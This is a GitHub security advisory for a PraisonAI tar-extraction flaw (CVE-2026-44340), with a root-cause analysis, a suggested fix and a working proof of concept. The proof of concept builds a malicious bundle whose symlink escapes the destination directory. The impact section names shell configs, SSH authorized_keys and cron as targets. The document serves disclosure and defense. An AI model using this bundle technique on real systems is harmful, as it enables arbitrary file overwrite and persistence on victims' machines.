GHSA-9Q28-GHCR-C4X3

Vulnerability from github – Published: 2026-05-11 13:59 – Updated: 2026-05-11 13:59
VLAI?
Summary
PraisonAI's symlink-extraction bypass of `_safe_extractall` writes outside `dest_dir`
Details

Summary

The _safe_extractall helper that all recipe pull, recipe publish, and recipe unpack flows route through validates each archive member's name for absolute paths, .. segments, and resolved-path escape — but does not validate member.linkname, does not reject symlink/hardlink members, and calls tar.extractall(dest_dir) without filter="data". A bundle that contains a symlink with a name inside dest_dir but a linkname pointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapes dest_dir and lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem.

Affected paths

Every code path that calls _safe_extractall is exposed:

Caller File:line
praisonai recipe unpack src/praisonai/praisonai/cli/features/recipe.py:1175 (introduced as the fix for GHSA-99g3-w8gr-x37c)
LocalRegistry.unpack (recipe pull) src/praisonai/praisonai/recipe/registry.py:413
Registry archive validation (publish) src/praisonai/praisonai/recipe/registry.py:808

Root cause

recipe/registry.py:131-178:

def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
    ...
    for member in tar.getmembers():
        ...
        member_path = Path(member.name)
        if member_path.is_absolute(): raise RegistryError(...)
        if '..' in member_path.parts: raise RegistryError(...)
        resolved = (dest_resolved / member_path).resolve()
        if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:
            raise RegistryError(...)
    # All members validated — safe to extract
    tar.extractall(dest_dir)

Three gaps:

  1. The loop checks only member.name. member.linkname (the symlink / hardlink target) is not inspected.
  2. member.issym() and member.islnk() are not used to refuse link members at all.
  3. tar.extractall(dest_dir) runs without filter="data". On Python ≤ 3.13 the default is fully_trusted (with a DeprecationWarning on 3.12+), which permits symlinks pointing outside dest_dir.

When the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker's chosen location.

Reproduction

Tested in a disposable container against praisonai==4.6.35 (pip install praisonai, no other modifications).

make_bundle.py:

import io, json, tarfile
manifest = json.dumps({"name": "legit", "version": "1.0.0"}).encode()
with tarfile.open("malicious.praison", "w:gz") as tar:
    info = tarfile.TarInfo("manifest.json"); info.size = len(manifest)
    tar.addfile(info, io.BytesIO(manifest))

    sym = tarfile.TarInfo("legit/escape")
    sym.type = tarfile.SYMTYPE
    sym.linkname = "/tmp/PWNED"
    tar.addfile(sym)

    payload = b"PWNED via symlink-extraction bypass of _safe_extractall\n"
    pf = tarfile.TarInfo("legit/escape/owned.txt"); pf.size = len(payload)
    tar.addfile(pf, io.BytesIO(payload))

direct_test.py:

import shutil, tarfile
from pathlib import Path
from praisonai.recipe.registry import _safe_extractall

DEST = Path("/work/recipes_direct")
shutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True)
Path("/tmp/PWNED").mkdir(parents=True, exist_ok=True)

with tarfile.open("malicious.praison", "r:gz") as tar:
    _safe_extractall(tar, DEST)

assert Path("/tmp/PWNED/owned.txt").exists(), "did not escape"
print("PWNED:", Path("/tmp/PWNED/owned.txt").read_text())

Run:

docker run --rm -v "$PWD:/work" -w /work python:3.11-slim sh -c '
  pip install -q praisonai &&
  python make_bundle.py &&
  python direct_test.py
'

Observed output:

_safe_extractall returned cleanly
PWNED: PWNED via symlink-extraction bypass of _safe_extractall

/tmp/PWNED/owned.txt exists after the call returns, written outside the destination directory the helper was asked to extract into.

Impact

Arbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious .praison bundle through any of the three callers above.

Realistic exploitation paths:

  • A user runs praisonai recipe unpack ./<malicious>.praison after obtaining the bundle from a shared registry, a tutorial link, or direct messaging.
  • A user runs praisonai recipe pull <name> against a malicious or compromised registry.
  • A registry server processes an uploaded .praison bundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).

Where the agent process runs as a regular user, the attacker can overwrite shell config (.bashrc, .zshrc, .profile), SSH authorized_keys, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and some sudo-launched workflows), the attacker controls arbitrary system files.

This re-opens the recipe pull, recipe publish, and recipe unpack paths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.

Suggested remediation

Single-line fix at recipe/registry.py:178:

tar.extractall(dest_dir, filter="data")

filter="data" (introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses symlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class. If you also support older Python, add an explicit guard inside the existing per-member loop before tar.extractall:

if member.issym() or member.islnk():
    link_target = (dest_resolved / member_path.parent / member.linkname).resolve()
    if member.linkname.startswith("/") or not str(link_target).startswith(str(dest_resolved) + os.sep):
        raise RegistryError(
            f"Refusing to extract link with target outside dest dir: "
            f"{member.name} -> {member.linkname}"
        )

Affected versions

praisonai >= 2.7.2 through current 4.6.35 (the helper exists at least back to the earliest path-traversal patch chain referenced in GHSA-99g3-w8gr-x37c). All releases that route extraction through _safe_extractall are exposed.

Disclosure

Reported privately via the project's GHSA workflow at https://github.com/MervinPraison/PraisonAI/security/advisories/new

-- Dhiral Vyas

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.6.36"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "PraisonAI"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.6.37"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44340"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T13:59:41Z",
    "nvd_published_at": "2026-05-08T14:16:47Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `_safe_extractall` helper that all `recipe pull`, `recipe publish`, and `recipe unpack` flows route through validates each archive member\u0027s `name` for absolute paths, `..` segments, and resolved-path escape \u2014 but does **not** validate `member.linkname`, does not reject symlink/hardlink members, and calls `tar.extractall(dest_dir)` without `filter=\"data\"`. A bundle that contains a symlink with a name\ninside `dest_dir` but a `linkname` pointing outside it, followed by a regular file whose path traverses *through* the just-created symlink, escapes `dest_dir` and lets the attacker write arbitrary content to an attacker-chosen location on the victim\u0027s filesystem.\n\n## Affected paths\n\nEvery code path that calls `_safe_extractall` is exposed:\n\n| Caller | File:line |\n|---|---|\n| `praisonai recipe unpack` | `src/praisonai/praisonai/cli/features/recipe.py:1175` (introduced as the fix for GHSA-99g3-w8gr-x37c) |\n| `LocalRegistry.unpack` (recipe pull) | `src/praisonai/praisonai/recipe/registry.py:413` |\n| Registry archive validation (publish) | `src/praisonai/praisonai/recipe/registry.py:808` |\n\n## Root cause\n\n`recipe/registry.py:131-178`:\n\n```python\ndef _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -\u003e None:\n    ...\n    for member in tar.getmembers():\n        ...\n        member_path = Path(member.name)\n        if member_path.is_absolute(): raise RegistryError(...)\n        if \u0027..\u0027 in member_path.parts: raise RegistryError(...)\n        resolved = (dest_resolved / member_path).resolve()\n        if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:\n            raise RegistryError(...)\n    # All members validated \u2014 safe to extract\n    tar.extractall(dest_dir)\n```\n\nThree gaps:\n\n1. The loop checks only `member.name`. `member.linkname` (the symlink / hardlink target) is not inspected.\n2. `member.issym()` and `member.islnk()` are not used to refuse link members at all.\n3. `tar.extractall(dest_dir)` runs without `filter=\"data\"`. On Python \u2264 3.13 the default is `fully_trusted` (with a DeprecationWarning on 3.12+), which permits symlinks pointing outside `dest_dir`.\n\nWhen the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker\u0027s chosen location.\n\n## Reproduction\n\nTested in a disposable container against `praisonai==4.6.35` (`pip install praisonai`, no other modifications).\n\n`make_bundle.py`:\n\n```python\nimport io, json, tarfile\nmanifest = json.dumps({\"name\": \"legit\", \"version\": \"1.0.0\"}).encode()\nwith tarfile.open(\"malicious.praison\", \"w:gz\") as tar:\n    info = tarfile.TarInfo(\"manifest.json\"); info.size = len(manifest)\n    tar.addfile(info, io.BytesIO(manifest))\n\n    sym = tarfile.TarInfo(\"legit/escape\")\n    sym.type = tarfile.SYMTYPE\n    sym.linkname = \"/tmp/PWNED\"\n    tar.addfile(sym)\n\n    payload = b\"PWNED via symlink-extraction bypass of _safe_extractall\\n\"\n    pf = tarfile.TarInfo(\"legit/escape/owned.txt\"); pf.size = len(payload)\n    tar.addfile(pf, io.BytesIO(payload))\n```\n\n`direct_test.py`:\n\n```python\nimport shutil, tarfile\nfrom pathlib import Path\nfrom praisonai.recipe.registry import _safe_extractall\n\nDEST = Path(\"/work/recipes_direct\")\nshutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True)\nPath(\"/tmp/PWNED\").mkdir(parents=True, exist_ok=True)\n\nwith tarfile.open(\"malicious.praison\", \"r:gz\") as tar:\n    _safe_extractall(tar, DEST)\n\nassert Path(\"/tmp/PWNED/owned.txt\").exists(), \"did not escape\"\nprint(\"PWNED:\", Path(\"/tmp/PWNED/owned.txt\").read_text())\n```\n\nRun:\n\n```bash\ndocker run --rm -v \"$PWD:/work\" -w /work python:3.11-slim sh -c \u0027\n  pip install -q praisonai \u0026\u0026\n  python make_bundle.py \u0026\u0026\n  python direct_test.py\n\u0027\n```\n\nObserved output:\n\n```\n_safe_extractall returned cleanly\nPWNED: PWNED via symlink-extraction bypass of _safe_extractall\n```\n\n`/tmp/PWNED/owned.txt` exists after the call returns, written outside the destination directory the helper was asked to extract into.\n\n## Impact\n\nArbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious `.praison` bundle through any of the three callers above.\n\nRealistic exploitation paths:\n\n- A user runs `praisonai recipe unpack ./\u003cmalicious\u003e.praison` after obtaining the bundle from a shared registry, a tutorial link, or\n  direct messaging.\n- A user runs `praisonai recipe pull \u003cname\u003e` against a malicious or compromised registry.\n- A registry server processes an uploaded `.praison` bundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).\n\nWhere the agent process runs as a regular user, the attacker can overwrite shell config (`.bashrc`, `.zshrc`, `.profile`), SSH `authorized_keys`, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and some `sudo`-launched workflows), the attacker controls arbitrary system files.\n\nThis re-opens the `recipe pull`, `recipe publish`, and `recipe unpack` paths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.\n\n## Suggested remediation\n\nSingle-line fix at `recipe/registry.py:178`:\n\n```python\ntar.extractall(dest_dir, filter=\"data\")\n```\n\n`filter=\"data\"` (introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses\nsymlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class.\nIf you also support older Python, add an explicit guard inside the existing per-member loop before `tar.extractall`:\n\n```python\nif member.issym() or member.islnk():\n    link_target = (dest_resolved / member_path.parent / member.linkname).resolve()\n    if member.linkname.startswith(\"/\") or not str(link_target).startswith(str(dest_resolved) + os.sep):\n        raise RegistryError(\n            f\"Refusing to extract link with target outside dest dir: \"\n            f\"{member.name} -\u003e {member.linkname}\"\n        )\n```\n\n## Affected versions\n\n`praisonai \u003e= 2.7.2` through current `4.6.35` (the helper exists at least back to the earliest path-traversal patch chain referenced in\nGHSA-99g3-w8gr-x37c). All releases that route extraction through `_safe_extractall` are exposed.\n\n## Disclosure\n\nReported privately via the project\u0027s GHSA workflow at\nhttps://github.com/MervinPraison/PraisonAI/security/advisories/new\n\n-- Dhiral Vyas",
  "id": "GHSA-9q28-ghcr-c4x3",
  "modified": "2026-05-11T13:59:41Z",
  "published": "2026-05-11T13:59:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9q28-ghcr-c4x3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44340"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PraisonAI\u0027s symlink-extraction bypass of `_safe_extractall` writes outside `dest_dir`"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.